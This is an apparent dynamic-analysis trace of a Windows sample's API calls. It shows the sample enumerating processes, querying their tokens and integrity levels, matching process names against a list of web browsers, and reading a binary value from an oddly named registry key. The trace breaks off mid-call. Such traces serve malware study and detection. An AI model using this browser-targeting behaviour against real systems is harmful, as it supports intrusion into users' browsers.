[0518.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0518.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0518.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0518.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0518.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xbc [0518.774] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x284) returned 1 [0518.774] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0518.775] GetLastError () returned 0x7a [0518.775] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0518.775] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0518.775] CloseHandle (hObject=0x284) returned 1 [0518.775] CloseHandle (hObject=0xbc) returned 1 [0518.775] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0518.775] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x284) returned 1 [0518.775] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0518.775] GetLastError () returned 0x7a [0518.775] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0518.775] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0518.775] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0518.775] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0518.775] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0518.775] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0518.775] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0518.776] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0518.776] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0518.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0518.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xbc [0518.776] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x284) returned 1 [0518.776] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0518.776] GetLastError () returned 0x7a [0518.776] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0518.776] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0518.776] CloseHandle (hObject=0x284) returned 1 [0518.776] CloseHandle (hObject=0xbc) returned 1 [0518.776] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0518.776] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x284) returned 1 [0518.776] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0518.776] GetLastError () returned 0x7a [0518.776] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0518.776] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0518.776] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0518.776] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0518.776] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0518.776] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0518.776] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0518.776] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0518.776] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0518.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xbc [0518.776] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x284) returned 1 [0518.776] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0518.776] GetLastError () returned 0x7a [0518.776] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0518.776] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0518.776] CloseHandle (hObject=0x284) returned 1 [0518.776] CloseHandle (hObject=0xbc) returned 1 [0518.776] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0518.776] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x284) returned 1 [0518.776] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0518.776] GetLastError () returned 0x7a [0518.776] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0518.776] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0518.777] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0518.777] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0518.777] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0518.777] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0518.777] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0518.777] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0518.777] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0518.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0518.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xbc [0518.777] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x284) returned 1 [0518.777] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0518.777] GetLastError () returned 0x7a [0518.777] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0518.777] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0518.777] CloseHandle (hObject=0x284) returned 1 [0518.777] CloseHandle (hObject=0xbc) returned 1 [0518.777] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0518.777] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x284) returned 1 [0518.777] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0518.777] GetLastError () returned 0x7a [0518.777] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0518.777] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0518.777] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0518.777] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0518.777] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0518.777] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0518.777] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0518.777] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0518.777] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0518.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0518.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0518.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0518.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xbc [0518.777] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x284) returned 1 [0518.777] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0518.777] GetLastError () returned 0x7a [0518.777] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0518.777] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0518.777] CloseHandle (hObject=0x284) returned 1 [0518.778] CloseHandle (hObject=0xbc) returned 1 [0518.778] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0518.778] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x284) returned 1 [0518.778] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0518.778] GetLastError () returned 0x7a [0518.778] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0518.778] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0518.778] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0518.778] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0518.778] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0518.778] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0518.778] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0518.778] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0518.778] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0518.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0518.778] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0518.778] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x20f788 | out: phkResult=0x20f788*=0xbc) returned 0x0 [0518.778] RegQueryValueExW (in: hKey=0xbc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x20f7b4, lpData=0x0, lpcbData=0x20f79c*=0x0 | out: lpType=0x20f7b4*=0x3, lpData=0x0, lpcbData=0x20f79c*=0x6f0) returned 0x0 [0518.778] RegQueryValueExW (in: hKey=0xbc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x20f7b4, lpData=0x4124b8, lpcbData=0x20f79c*=0x6f0 | out: lpType=0x20f7b4*=0x3, lpData=0x4124b8*, lpcbData=0x20f79c*=0x6f0) returned 0x0 [0518.778] RegCloseKey (hKey=0xbc) returned 0x0 [0520.783] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0520.783] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0520.783] GetLastError () returned 0x7a [0520.783] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0520.783] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0520.783] CloseHandle (hObject=0x5d8) returned 1 [0520.783] CloseHandle (hObject=0x2cc) returned 1 [0520.783] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0520.783] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0520.783] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0520.783] GetLastError () returned 0x7a [0520.783] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0520.783] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0520.783] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0520.783] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0520.783] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0520.783] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0520.783] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0520.783] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0520.783] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0520.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0520.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x2cc [0520.783] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0520.783] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0520.783] GetLastError () returned 0x7a [0520.783] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0520.783] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0520.783] CloseHandle (hObject=0x5d8) returned 1 [0520.783] CloseHandle (hObject=0x2cc) returned 1 [0520.783] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0520.784] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0520.784] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0520.784] GetLastError () returned 0x7a [0520.784] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0520.784] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0520.784] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0520.784] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0520.784] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0520.784] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0520.784] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0520.784] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0520.784] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0520.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x2cc [0520.784] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0520.784] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0520.784] GetLastError () returned 0x7a [0520.784] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0520.784] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0520.784] CloseHandle (hObject=0x5d8) returned 1 [0520.784] CloseHandle (hObject=0x2cc) returned 1 [0520.784] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0520.784] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0520.784] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0520.784] GetLastError () returned 0x7a [0520.784] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0520.784] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0520.784] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0520.784] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0520.784] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0520.784] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0520.784] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0520.784] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0520.784] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0520.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0520.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x2cc [0520.784] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0520.784] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0520.784] GetLastError () returned 0x7a [0520.785] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0520.785] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0520.785] CloseHandle (hObject=0x5d8) returned 1 [0520.785] CloseHandle (hObject=0x2cc) returned 1 [0520.785] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0520.785] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, 